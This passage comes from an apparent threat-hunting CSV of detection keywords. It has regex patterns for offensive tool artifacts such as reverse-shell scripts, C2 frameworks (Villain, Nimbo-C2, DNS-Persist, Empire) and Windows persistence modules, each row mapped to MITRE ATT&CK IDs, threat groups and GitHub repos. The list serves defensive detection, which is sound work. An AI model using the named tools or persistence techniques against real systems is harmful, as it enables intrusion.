-h*",".{0,1000}perl\snikto\.pl\s\-h.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","54664" "*perl nipe.pl install*",".{0,1000}perl\snipe\.pl\sinstall.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","54665" "*perl nipe.pl 
start*",".{0,1000}perl\snipe\.pl\sstart.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","54666" "*perl_no_sh_reverse_tcp.py*",".{0,1000}perl_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54667" "*perl-reverse-shell.*",".{0,1000}perl\-reverse\-shell\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","54668" "*Permits to backup a DACL before a modification*",".{0,1000}Permits\sto\sbackup\sa\sDACL\sbefore\sa\smodification.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54669" "*PersAutorun.cs*",".{0,1000}PersAutorun\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","54670" "*PersCLRInstall.cs*",".{0,1000}PersCLRInstall\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","54671" "*persist exceladdin*",".{0,1000}persist\sexceladdin.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - 
TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54672" "*persist logonscript*",".{0,1000}persist\slogonscript.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54673" "*persist run *hkcu*",".{0,1000}persist\srun\s.{0,1000}hkcu.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","54674" "*persist run *hklm*",".{0,1000}persist\srun\s.{0,1000}hklm.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","54675" "*persist runkey*",".{0,1000}persist\srunkey.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54676" "*persist spe 
*.exe*",".{0,1000}persist\sspe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","54677" "*Persist.cna*",".{0,1000}Persist\.cna.{0,1000}","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z","54678" "*Persist\autorun.cs*",".{0,1000}Persist\\autorun\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54679" "*Persist\eventviewer.cs*",".{0,1000}Persist\\eventviewer\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54680" "*Persist\powershell.cs*",".{0,1000}Persist\\powershell\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54681" "*Persist\screensaver.cs*",".{0,1000}Persist\\screensaver\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54682" "*Persist\startup.cs*",".{0,1000}Persist\\startup\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54683" "*Persist\winlogon.cs*",".{0,1000}Persist\\winlogon\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54684" "*PersistBOF.cna*",".{0,1000}PersistBOF\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54685" "*Persistence.exe*",".{0,1000}Persistence\.exe.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54686" "*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","54687" "*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","54688" "*Persistence/InstallWMI*",".{0,1000}Persistence\/InstallWMI.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","54689" "*persistence/userland/backdoor_lnk*",".{0,1000}persistence\/userland\/backdoor_lnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 
- T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","54690" "*Persistence_AccountManipulation_Windows.py*",".{0,1000}Persistence_AccountManipulation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54691" "*Persistence_Guard_Windows.py*",".{0,1000}Persistence_Guard_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - 
T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54692" "*Persistence_LogonScripts_Windows.py*",".{0,1000}Persistence_LogonScripts_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54693" "*Persistence_NewService_Windows.py*",".{0,1000}Persistence_NewService_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54694" "*Persistence_OfficeApplicationStartup_OfficeTest.py*",".{0,1000}Persistence_OfficeApplicationStartup_OfficeTest\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54695" "*Persistence_Other_WindowsLibraryMs.py*",".{0,1000}Persistence_Other_WindowsLibraryMs\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54696" "*Persistence_RegistryRunKeys_SharpHide.py*",".{0,1000}Persistence_RegistryRunKeys_SharpHide\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54697" "*Persistence_RegistryRunKeys_Windows.py*",".{0,1000}Persistence_RegistryRunKeys_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54698" "*Persistence_ScheduledTask_Windows.py*",".{0,1000}Persistence_ScheduledTask_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54699" "*Persistence_WinlogonHelperDLL_Windows.py*",".{0,1000}Persistence_WinlogonHelperDLL_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54700" "*Persistence-Accessibility-Features-master*",".{0,1000}Persistence\-Accessibility\-Features\-master.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","54701" "*PersistenceBOF.c*",".{0,1000}PersistenceBOF\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red 
teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54702" "*PersistenceBOF.exe*",".{0,1000}PersistenceBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54703" "*persistent-security/SMShell*",".{0,1000}persistent\-security\/SMShell.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","54704" "*persist-ice-junction.o*",".{0,1000}persist\-ice\-junction\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 